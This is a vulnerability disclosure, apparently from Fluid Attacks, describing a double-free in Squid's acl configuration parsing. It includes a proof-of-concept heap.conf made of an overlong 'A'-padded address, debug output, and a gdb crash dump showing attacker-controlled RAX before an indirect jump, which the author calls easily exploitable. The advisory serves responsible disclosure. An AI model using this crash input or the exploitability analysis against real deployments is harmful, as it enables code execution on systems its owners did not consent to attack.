A Double-Free bug was found in Squid versions 4.14 and 5.0.5 when
processing the "acl" directive on configuration files, more
specifically the first and second addresses.

This may allow arbitrary code execution on a Squid deployment on where the
configuration files may be processed from untrusted sources.

The following sample configuration file causes the overflow:

# cat heap.conf
acl localnet src
1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0/16

This is the relevant debug output using "/usr/local/sbin/squid -f heap.conf
-N -X"

2021/02/09 11:25:10.856| 24,7| MemBlob.cc(130) syncSize: 5 was: 6
2021/02/09 11:25:10.856| 24,8| SBuf.cc(898) cow: SBuf113 no cow needed;
have 35
2021/02/09 11:25:10.856| 3,5| cache_cf.cc(533) parseOneConfigFile:
Processing: acl localnet src
1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0/16
2021/02/09 11:25:10.856| 28,9| Acl.cc(96) FindByName: ACL::FindByName
'localnet'
2021/02/09 11:25:10.856| 28,9| Acl.cc(102) FindByName: ACL::FindByName
found no match
2021/02/09 11:25:10.856| 28,3| Acl.cc(233) ParseAclLine: aclParseAclLine:
Creating ACL 'localnet'
2021/02/09 11:25:10.856| 28,4| Acl.cc(64) Make: src=0x555555e165d0
2021/02/09 11:25:10.856| 24,8| SBuf.cc(30) SBuf: SBuf253 created
2021/02/09 11:25:10.856| 24,8| SBuf.cc(30) SBuf: SBuf254 created
2021/02/09 11:25:10.856| 24,8| SBuf.cc(30) SBuf: SBuf255 created
2021/02/09 11:25:10.856| 24,8| SBuf.cc(70) ~SBuf: SBuf255 destructed
2021/02/09 11:25:10.856| 24,8| SBuf.cc(70) ~SBuf: SBuf254 destructed
2021/02/09 11:25:10.856| 24,8| SBuf.cc(70) ~SBuf: SBuf253 destructed
2021/02/09 11:25:10.856| 28,5| Ip.cc(222) FactoryParse: aclIpParseIpData:
1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0/16
2021/02/09 11:25:10.856| 28,9| Ip.cc(358) FactoryParse: aclIpParseIpData:
'1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0/16'
matched: non-IP pattern: %[^/]/%s
2021/02/09 11:25:10.856| 14,3| Address.cc(389) lookupHostIP: Given Non-IP
'1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0':
Name or service not known
2021/02/09 11:25:10.856| aclIpParseIpData: unknown first address in
'1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA92.168.0.0/16'

Program received signal SIGSEGV, Segmentation fault.
0x0000555555af55e0 in Mem::AllocatorProxy::freeOne (this=<optimized out>,
address=0x555555e15e80) at AllocatorProxy.cc:22
22    getAllocator()->freeOne(address);
/home/aroldan/.gdbinit-gef.py:2425: DeprecationWarning: invalid escape
sequence '\é'
  res = gdb.Value(address).cast(char_ptr).string(encoding=encoding,
length=length).strip()

[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
registers ────
$rax   : 0x4141414141414141 ("AAAAAAAA"?)
$rbx   : 0x0000555555c77f60  →  0x0000000900000009
$rcx   : 0x0000555555dcd010  →  0x0003000200010004
$rdx   : 0x39
$rsp   : 0x00007fffffffe3c8  →  0x00005555558c4f93  →
 <acl_ip_data::FactoryParse(char+0> call 0x555555709d10 <_Z13self_destructv>
$rbp   : 0x0000555555e18da0  →
 "1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$rsi   : 0x0000555555e15e80  →  0x0000000000000000
$rdi   : 0x4141414141414141 ("AAAAAAAA"?)
$rip   : 0x0000555555af55e0  →  <Mem::AllocatorProxy::freeOne(void*)+16>
mov rax, QWORD PTR [rax]
$r8    : 0x0
$r9    : 0x3b4
$r10   : 0x0000555555e19120  →  0x0000000000000000
$r11   : 0x246
$r12   : 0x0
$r13   : 0x0000555555d67aa0  →
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$r14   : 0x0000555555e0a220  →  0x0000555555c49f98  →  0x00007ffff787ef20
 →  <std::__cxx11::basic_ostringstream<char,+0> mov rax, QWORD PTR
[rip+0x9e619]        # 0x7ffff791d540
$r15   : 0x00007fffffffe450  →  0x0000555555b37e3e  →  "FactoryParse"
$eflags: [zero carry PARITY adjust sign trap INTERRUPT direction overflow
RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
stack ────
0x00007fffffffe3c8│+0x0000: 0x00005555558c4f93  →
 <acl_ip_data::FactoryParse(char+0> call 0x555555709d10
<_Z13self_destructv> ← $rsp
0x00007fffffffe3d0│+0x0008: 0x000000000000003d ("="?)
0x00007fffffffe3d8│+0x0010: 0x00007fffffffe450  →  0x0000555555b37e3e  →
 "FactoryParse"
0x00007fffffffe3e0│+0x0018: 0x000000000000036e
0x00007fffffffe3e8│+0x0020: 0x0000555555b067d7  →  <xstrndup+39> pop rbx
0x00007fffffffe3f0│+0x0028: 0x00007fffffffe47c  →  0x55e17eae00000000
0x00007fffffffe3f8│+0x0030: 0x00007fffffffe480  →  0x0000555555e17eae  →
 0x0000000000000000
0x00007fffffffe400│+0x0038: 0x0000555555e15e80  →  0x0000000000000000
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
code:x86:64 ────
   0x555555af55d9 <Mem::AllocatorProxy::freeOne(void*)+9> mov    rsi, rbp
   0x555555af55dc <Mem::AllocatorProxy::freeOne(void*)+12> pop    rbp
   0x555555af55dd <Mem::AllocatorProxy::freeOne(void*)+13> mov    rdi, rax
 → 0x555555af55e0 <Mem::AllocatorProxy::freeOne(void*)+16> mov    rax,
QWORD PTR [rax]
   0x555555af55e3 <Mem::AllocatorProxy::freeOne(void*)+19> mov    rax,
QWORD PTR [rax+0x28]
   0x555555af55e7 <Mem::AllocatorProxy::freeOne(void*)+23> jmp    rax
   0x555555af55e9                  nop
   0x555555af55ea                  nop    WORD PTR [rax+rax*1+0x0]
   0x555555af55f0 <Mem::AllocatorProxy::inUseCount()+0> mov    rdi, QWORD
PTR [rdi+0x10]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
source:AllocatorProxy.cc+22 ────
     17 }
     18
     19 void
     20 Mem::AllocatorProxy::freeOne(void *address)
     21 {
 →   22     getAllocator()->freeOne(address);
     23     /* TODO: check for empty, and if so, if the default type has
altered,
     24      * switch
     25      */
     26 }
     27
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
threads ────
[#0] Id 1, Name: "squid", stopped 0x555555af55e0 in
Mem::AllocatorProxy::freeOne (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
trace ────
[#0] 0x555555af55e0 → Mem::AllocatorProxy::freeOne(this=<optimized out>,
address=0x555555e15e80)
[#1] 0x5555558c4f93 → acl_ip_data::operator delete(address=<optimized out>)
[#2] 0x5555558c4f93 → acl_ip_data::operator delete(address=<optimized out>)
[#3] 0x5555558c4f93 → acl_ip_data::FactoryParse(t=<optimized out>)
[#4] 0x5555558c68de → ACLIP::parse(this=0x555555e165d0)
[#5] 0x5555559052ff → ACL::ParseAclLine(parser=<optimized out>,
head=0x555555db9228 <Config+1320>)
[#6] 0x55555571b712 → parse_acl(ae=<optimized out>)
[#7] 0x55555571b712 → parse_line(buff=<optimized out>)
[#8] 0x55555572055f → parseOneConfigFile(file_name=0x555555ddf520
"heap.conf", depth=0x0)
[#9] 0x55555572127d → parseConfigFileOrThrow(file_name=0x555555ddf520
"heap.conf")
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

It can be easily exploitable too, because I control the value on RAX and
the execution stopped at
 → 0x555555af55e0 <Mem::AllocatorProxy::freeOne(void*)+16> mov    rax,
QWORD PTR [rax]
   0x555555af55e3 <Mem::AllocatorProxy::freeOne(void*)+19> mov    rax,
QWORD PTR [rax+0x28]
   0x555555af55e7 <Mem::AllocatorProxy::freeOne(void*)+23> jmp    rax

Environment information:

   - Squid release version: Tested on 4.14 and 5.0.5
   - Operating System type and version:
   - Debian GNU/Linux bullseye/sid
      - Compiled with gcc (Debian 10.2.1-6) 10.2.1 20210110

Timeline:

   - 2021-02-08: Vulnerability discovered.
   - 2021-02-09: Vendor contacted.
   - 2021-02-10: Vendor replied asking to test for the vulnerability once
   the patch is available.
   - 2021-02-22: Vendor contacted again to check for updates.
   - 2021-02-22: Vendor replied that, although this bug is not worth hiding
   because of the nature of the exploitation environment.
   - 2021-02-24: Public disclosure

References:

   - https://fluidattacks.com/advisories/morrison/


--
Andrés Roldán, +57-313-646-36-78
 *___*

*| >>|> fluid|___|  attacks, we hack your software*

-- 
Legal Notice <https://fluidattacks.com/web/terms-use/>